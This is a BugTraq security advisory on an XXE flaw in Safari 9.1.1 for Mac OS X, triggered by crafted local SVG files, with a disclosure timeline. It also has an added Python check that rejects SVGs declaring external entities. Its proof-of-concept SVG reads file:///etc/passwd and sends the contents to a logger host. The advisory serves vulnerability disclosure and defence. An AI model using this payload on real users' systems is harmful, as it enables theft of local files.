BugTraq
Apple Safari for Mac OS X SVG local XXE Jul 05 2016 08:12AM
Filippo Cavallarin (filippo cavallarin wearesegment com)
Advisory ID: SGMA16-003
Title: Apple Safari for Mac OS X SVG local XXE
Product: Apple Safari for Mac OS X
Version: 9.1.1 and probably prior
Vendor: apple.com
Vulnerability type: XXE
Risk level: Medium
Credit: Filippo Cavallarin - wearesegment.com
CVE: N/A
Vendor notification: 2015-04-08
Vendor fix: N/A
Public disclosure: 2016-07-05

Details

Safari for Mac OS X is prone to an XXE vulnerability when processing crafted SVG images.
An attacker may use this vulnerability to steal files from the local computer by tricking a user
into opening an SVG image from a local location (e.g. a USB key).
This vulnerability is mitigated by File Quarantine and does not work with downloaded files.

Proof of concept:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="19000px" xmlns:xlink="http://www.w3.org/1999/xlink" >
<text x="-1000" y="-1000" >&xxe;</text>
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script>
var logger = "http://logger.local/?file=" + encodeURIComponent(document.getElementsByTagName("text")[0].innerHTML);
document.createElementNS('http://www.w3.org/2000/svg','image').setAttributeNS('http://www.w3.org/1999/xlink','href', logger);

</script>

</svg>
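As an added example (not part of the original advisory), a check a defender can run on SVG files before they reach an XML parser or renderer: it uses Python's stdlib expat bindings to report any external entity declared in the DTD, the construct the PoC above relies on, and refuses to parse such files. The two sample SVGs and the file:///PLACEHOLDER path are constructed for illustration.

```python
import xml.parsers.expat
from xml.etree import ElementTree


def find_external_entities(svg_bytes):
    """Return [(entity_name, system_id), ...] for each external entity declared
    in the document's internal DTD subset. Nothing is fetched: parameter-entity
    parsing is off, so an external DTD is never loaded, and references to
    external general entities in content are acknowledged but not resolved."""
    found = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry replacement text in `value`; external ones carry
        # a SYSTEM/PUBLIC identifier instead. Only the latter can read local files.
        if value is None and (system_id is not None or public_id is not None):
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.EntityDeclHandler = on_entity_decl
    # Returning 1 tells expat to continue without reading the referenced resource.
    parser.ExternalEntityRefHandler = lambda context, base, system_id, public_id: 1
    parser.Parse(svg_bytes, True)
    return found


def parse_svg_safely(svg_bytes):
    """Parse with ElementTree only if no external entity is declared; otherwise
    raise, which is the safe default for files arriving from removable media."""
    externals = find_external_entities(svg_bytes)
    if externals:
        listing = ", ".join(f"{name} -> {sid}" for name, sid in externals)
        raise ValueError(f"refusing SVG that declares external entities: {listing}")
    return ElementTree.fromstring(svg_bytes)


# Constructed samples: a benign SVG and one mirroring the advisory's DTD pattern,
# with a placeholder path in place of a real local file.
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<circle cx="50" cy="50" r="40" fill="red"/>
</svg>"""

XXE_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///PLACEHOLDER/local-file">
]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>"""
```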

Notes

The vendor has been notified more than one year before public disclosure and the answer was that the issue was
still under analysis. We contacted the vendor again a few weeks before public disclosure but we got no reply.

Solution

N/A

References

https://www.wearesegment.com/research/Apple-Safari-for-Mac-OS-X-SVG-local-XXE

